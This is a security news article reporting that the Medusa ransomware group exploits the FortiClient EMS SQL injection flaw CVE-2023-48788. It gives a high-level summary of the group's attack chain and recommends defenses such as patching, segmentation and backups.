The notorious Medusa ransomware group has been exploiting a critical vulnerability in Fortinet’s FortiClient EMS software to launch sophisticated ransomware attacks.
The SQL injection flaw, tracked as CVE-2023-48788, allows attackers to execute malicious code on vulnerable systems and gain a foothold for deploying ransomware.
“Medusa gains access to a target system through a known weakness such as the Fortinet EMS SQL injection vulnerability. CVE-2023-48788 impacts environments that have FortiClient EMS, versions 7.2 to 7.2.2 and 7.0.1 to 7.0.10, installed to manage endpoints,” Bitdefender said.
Decoding Compliance: What CISOs Need to Know – Join Free Webinar
Medusa, known for targeting a wide range of sectors, including healthcare, manufacturing, and education, has been quick to capitalize on the Fortinet vulnerability.
By sending malicious web requests containing SQL statements, the group manipulates the FCTUID parameter in request headers, enabling them to execute arbitrary commands via the xp_cmdshell function in Microsoft SQL Server.
Once initial access is gained, Medusa creates a webshell on the compromised server to facilitate data exfiltration and payload delivery. Bitdefender said the group employs tools like bitsadmin to transfer malicious files and establish persistence on victim systems.
Medusa’s attack chain showcases the group’s advanced capabilities, particularly in the areas of execution and defense evasion. After gaining a foothold, Medusa leverages PowerShell scripts to run commands, exfiltrate data, and execute its ransomware payload. The group’s malware, known as gaze.exe, kills various services and loads files referencing Tor links for data exfiltration.
To evade detection, Medusa installs compromised versions of legitimate remote monitoring and management (RMM) tools like ConnectWise and AnyDesk. These tampered RMM tools often go unnoticed due to their trusted status within the victim’s environment.
Organizations can adopt a multi-layered approach to defend against Medusa’s ransomware attacks. Implementing robust patch management practices is crucial to promptly address vulnerabilities like the Fortinet flaw.
Network segmentation, regular backups, and employee security awareness training are also essential components of a comprehensive defense strategy.
As Medusa continues to evolve and refine its techniques, it is imperative for businesses to remain vigilant and proactive in their cybersecurity efforts.
Simulating Cyberattack Scenarios With All-in-One Cybersecurity Platform – Watch Free Webinar
The Cl0p ransomware group has claimed responsibility for infiltrating Broadcom's internal systems as part of…
Grafana Labs has disclosed a critical security vulnerability affecting Grafana Enterprise that could allow attackers…
A critical security vulnerability has been discovered in ASUSTOR backup and synchronization software, allowing attackers…
Microsoft has introduced a practical new feature in Windows 11 designed specifically for public-facing monitors…
SonicWall has disclosed a critical stack-based buffer overflow vulnerability in its SonicOS SSLVPN service. That…
OpenAI has launched GPT-5.1-Codex-Max, a specialized coding model designed to handle complex development tasks autonomously. The…